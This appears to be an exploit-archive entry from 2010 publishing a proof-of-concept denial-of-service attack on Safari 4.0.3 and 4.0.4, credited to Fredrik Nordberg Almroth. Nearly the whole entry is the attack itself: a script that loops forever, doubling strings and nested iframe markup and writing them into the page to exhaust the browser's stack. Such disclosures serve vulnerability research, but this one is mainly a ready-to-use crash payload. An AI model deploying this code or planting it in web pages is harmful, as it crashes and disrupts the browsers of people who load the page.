[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Safari 4.0.3 & 4.0.4 Stack Exhaustion
# Published : 2010-04-28
# Author : Fredrik Nordberg Almroth
# Previous Title : Webmoney Advisor ActiveX Remote DoS Exploit
# Next Title : Acoustica v. 3.32 cd/dvd label maker .m3u PoC


<script>
//Written by: Fredrik Nordberg Almroth
//URL: http://h.ackack.net/
//Affected: Safari 4.0.3 & 4.0.4 - Other versions might be vulnerable aswell.
  a="<script>var b="<iframe src='javascript:window.location="boom"'></iframe>";while(1){b=b+b;document.write(b);}</scr"+"ipt>";
  while(1){
    a=a+a;
    document.write(a);
  }
</script>